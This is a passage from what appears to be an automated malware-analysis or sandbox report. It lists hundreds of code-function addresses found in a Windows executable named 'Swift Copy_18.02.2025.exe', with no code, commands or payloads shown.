            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7D6606_2_38E7D660
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7D6706_2_38E7D670
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7D2096_2_38E7D209
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7D2186_2_38E7D218
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7E7CF6_2_38E7E7CF
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7E7D06_2_38E7E7D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E71F986_2_38E71F98
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7E3776_2_38E7E377
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7E3786_2_38E7E378
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7DF206_2_38E7DF20
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E70B206_2_38E70B20
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E70B306_2_38E70B30
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7DF116_2_38E7DF11
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390681D06_2_390681D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906FC186_2_3906FC18
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906B3186_2_3906B318
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39067B786_2_39067B78
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39068FB06_2_39068FB0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906A9286_2_3906A928
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906A9386_2_3906A938
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906E5386_2_3906E538
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906C5486_2_3906C548
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906E5486_2_3906E548
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39060D486_2_39060D48
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906C5586_2_3906C558
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906119F6_2_3906119F
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390611A06_2_390611A0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906E9C86_2_3906E9C8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906C9D86_2_3906C9D8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906E9D86_2_3906E9D8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390615E86_2_390615E8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906C9E86_2_3906C9E8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390615F86_2_390615F8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906DC196_2_3906DC19
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390660216_2_39066021
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906BC2A6_2_3906BC2A
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906DC286_2_3906DC28
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390660306_2_39066030
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906BC386_2_3906BC38
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390600406_2_39060040
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390634506_2_39063450
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390634606_2_39063460
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390664786_2_39066478
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390664886_2_39066488
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390604986_2_39060498
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906E0A76_2_3906E0A7
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906C0B76_2_3906C0B7
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906E0B86_2_3906E0B8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390638B86_2_390638B8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906C0C86_2_3906C0C8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390608F06_2_390608F0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906B3076_2_3906B307
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390623006_2_39062300
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906D3086_2_3906D308
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390677226_2_39067722
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390677206_2_39067720
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390653286_2_39065328
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390627486_2_39062748
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390627586_2_39062758
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39067B696_2_39067B69
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390657706_2_39065770
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906F7786_2_3906F778
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906D7876_2_3906D787
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390657806_2_39065780
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906F7886_2_3906F788
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906B7986_2_3906B798
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906D7986_2_3906D798
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39062BA06_2_39062BA0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39068FA16_2_39068FA1
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906B7A86_2_3906B7A8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39062BB06_2_39062BB0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39065BD86_2_39065BD8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39066A076_2_39066A07
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39066A186_2_39066A18
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390646226_2_39064622
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390646206_2_39064620
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39061A4F6_2_39061A4F
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906EE576_2_3906EE57
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39061A506_2_39061A50
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906CE676_2_3906CE67
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906EE686_2_3906EE68
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39066E726_2_39066E72
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39066E706_2_39066E70
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906CE786_2_3906CE78
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39064A786_2_39064A78
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39061E986_2_39061E98
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39061EA86_2_39061EA8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39064EC06_2_39064EC0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390672CA6_2_390672CA
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390672C86_2_390672C8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39064ED06_2_39064ED0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906F2E76_2_3906F2E7
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906D2F76_2_3906D2F7
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390622F06_2_390622F0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3906F2F86_2_3906F2F8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D6B406_2_390D6B40
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D66786_2_390D6678
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D5FD86_2_390D5FD8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D49086_2_390D4908
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D70086_2_390D7008
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DC6086_2_390DC608
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D29076_2_390D2907
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D00066_2_390D0006
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DDE006_2_390DDE00
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DAE1F6_2_390DAE1F
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D52196_2_390D5219
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D29186_2_390D2918
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DC6186_2_390DC618
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D83186_2_390D8318
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DF1116_2_390DF111
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D17106_2_390D1710
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D9B106_2_390D9B10
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D52286_2_390D5228
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D83286_2_390D8328
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D322A6_2_390D322A
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DD9276_2_390DD927
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DF1206_2_390DF120
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D5B396_2_390D5B39
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D32386_2_390D3238
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DD9386_2_390DD938
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D96376_2_390D9637
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DAE306_2_390DAE30
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D6B306_2_390D6B30
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D5B486_2_390D5B48
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D96486_2_390D9648
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D3B4A6_2_390D3B4A
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DEC4A6_2_390DEC4A
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D00406_2_390D0040
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DC1426_2_390DC142
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D3B586_2_390D3B58
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DEC586_2_390DEC58
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DA9586_2_390DA958
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DC1506_2_390DC150
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D09506_2_390D0950
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D7E506_2_390D7E50
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DA9686_2_390DA968
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D44686_2_390D4468
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D65686_2_390D6568
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D09606_2_390D0960
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D7E606_2_390D7E60
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DD4606_2_390DD460
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DE77F6_2_390DE77F
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D44786_2_390D4478
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D24786_2_390D2478
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DBC786_2_390DBC78
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D91716_2_390D9171
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DD4706_2_390DD470
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D12706_2_390D1270
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DA48F6_2_390DA48F
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D4D896_2_390D4D89
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D24886_2_390D2488
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DBC886_2_390DBC88
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D79886_2_390D7988
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D12806_2_390D1280
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D91806_2_390D9180
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D4D986_2_390D4D98
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D79986_2_390D7998
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D2D9A6_2_390D2D9A
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D1B916_2_390D1B91
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DE7906_2_390DE790
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DB7AF6_2_390DB7AF
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D8CA96_2_390D8CA9
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D2DA86_2_390D2DA8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DCFA86_2_390DCFA8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D56A86_2_390D56A8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DCFA66_2_390DCFA6
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D1BA06_2_390D1BA0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DA4A06_2_390DA4A0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DFAA06_2_390DFAA0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D74BF6_2_390D74BF
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D56B86_2_390D56B8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D8CB86_2_390D8CB8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DE2B86_2_390DE2B8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D36B76_2_390D36B7
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DFAB06_2_390DFAB0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D36C86_2_390D36C8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DE2C86_2_390DE2C8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D9FC86_2_390D9FC8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D5FC76_2_390D5FC7
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DB7C06_2_390DB7C0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D04C06_2_390D04C0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D9FD86_2_390D9FD8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D3FD86_2_390D3FD8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DF5D76_2_390DF5D7
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DCAD16_2_390DCAD1
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D04D06_2_390D04D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D74D06_2_390D74D0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D3FE86_2_390D3FE8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DF5E86_2_390DF5E8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D1FE86_2_390D1FE8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DB2E86_2_390DB2E8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DCAE06_2_390DCAE0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D0DE06_2_390D0DE0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D87E06_2_390D87E0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D16FF6_2_390D16FF
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D9AFF6_2_390D9AFF
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D1FF86_2_390D1FF8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DB2F86_2_390DB2F8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D6FFA6_2_390D6FFA
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D48F76_2_390D48F7
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D0DF06_2_390D0DF0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390D87F06_2_390D87F0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390DDDF06_2_390DDDF0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F73E06_2_390F73E0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390FDA306_2_390FDA30
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F45006_2_390F4500
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F13006_2_390F1300
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F61206_2_390F6120
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F2F206_2_390F2F20
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F4B406_2_390F4B40
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F19406_2_390F1940
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F03566_2_390F0356
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390FF1686_2_390FF168
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F67606_2_390F6760
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F35606_2_390F3560
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F03606_2_390F0360
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F51806_2_390F5180
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F1F806_2_390F1F80
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F6D906_2_390F6D90
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F3BA06_2_390F3BA0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F09A06_2_390F09A0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F6DA06_2_390F6DA0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F57C06_2_390F57C0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F25C06_2_390F25C0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F41E06_2_390F41E0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F0FE06_2_390F0FE0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F5E006_2_390F5E00
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F2C006_2_390F2C00
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F48206_2_390F4820
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F16206_2_390F1620
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F64406_2_390F6440
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F32406_2_390F3240
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F00406_2_390F0040
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F4E606_2_390F4E60
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F1C606_2_390F1C60
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F06706_2_390F0670
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F6A706_2_390F6A70
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F6A806_2_390F6A80
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F38806_2_390F3880
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F06806_2_390F0680
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390FF0A46_2_390FF0A4
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F54A06_2_390F54A0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F22A06_2_390F22A0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F70C06_2_390F70C0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F3EC06_2_390F3EC0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F0CC06_2_390F0CC0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F5AE06_2_390F5AE0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F28E06_2_390F28E0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F12F06_2_390F12F0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_390F44F06_2_390F44F0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910FB306_2_3910FB30
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391084706_2_39108470
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39101CF06_2_39101CF0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910AD106_2_3910AD10
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910DF106_2_3910DF10
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391005086_2_39100508
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910C9306_2_3910C930
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391097306_2_39109730
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910E5506_2_3910E550
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910B3506_2_3910B350
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391013516_2_39101351
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_39109D706_2_39109D70
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910CF706_2_3910CF70
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391013606_2_39101360
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391033606_2_39103360
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910B9906_2_3910B990
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_391087906_2_39108790
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910EB906_2_3910EB90
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_3910D5B06_2_3910D5B0
